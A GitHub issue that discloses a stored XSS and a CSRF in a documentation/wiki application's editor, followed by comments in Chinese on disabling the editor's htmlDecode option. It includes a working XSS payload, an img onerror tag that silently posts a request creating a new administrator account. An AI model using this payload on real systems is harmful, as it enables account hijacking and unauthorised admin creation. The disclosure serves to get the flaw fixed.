Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Vulnerability: Stored XSS and CSRF #68

Open
0x2E opened this issue May 14, 2019 · 2 comments
Open

Vulnerability: Stored XSS and CSRF #68

0x2E opened this issue May 14, 2019 · 2 comments
Labels
bug Something isn't working

Comments

@0x2E
Copy link

0x2E commented May 14, 2019

Hello, I found two vulnerabilities: a stored XSS and a CSRF.
Attacker can exploit the vulnerability to execute malicious javascript on a document page and hijack the identity of other users (normal users or administrators).

XSS

The document editor does not filter or block the execution of Javascript, resulting in stored XSS. Any user browsing the document containing XSS malicious code will trigger the vulnerability.

xss

CSRF

Using the XSS vulnerability from the previous step, attacker can hijack the identity of other users. I recorded a GIF to demonstrate a normal user hijacking the super administrator's identity to create a new administrator account.

Payload

<img src=# onerror='eval(decodeURI("var%20a%20=%20window.XMLHttpRequest%20?%20new%20XMLHttpRequest()%20:%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);a.open(%22POST%22,%22/system/user/save%22,false);a.setRequestHeader(%22Content-type%22,%22application/x-www-form-urlencoded%22);a.send(%22username=hack&given_name=hack&password=hack&email=1%25401.cn&mobile=18888888888&role_id=1&phone=&department=&position=&location=&im=%22);"))'>
@phachon phachon added the bug Something isn't working label May 14, 2019
@GrandMarch
Copy link

GrandMarch commented May 31, 2019

/views/page/edit.html 中editor.md的参数项
htmlDecode : "style,script,iframe|on*",
修改为
htmlDecode : false,
其他的view中似乎也存在htmlDecode参数项设置为允许的情况,没有仔细看,似乎都可以禁掉,理论上确实也不需要。

@phachon
Copy link
Owner

phachon commented Jun 1, 2019

@GrandMarch 是的,修改为 htmlDecode : false, 不能解析 html 标签,是可以屏蔽掉。但是考虑到扩展性,可以直接写 html 标签可以更灵活一点。所以这里现在我还没有决定要不要取消它

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

3 participants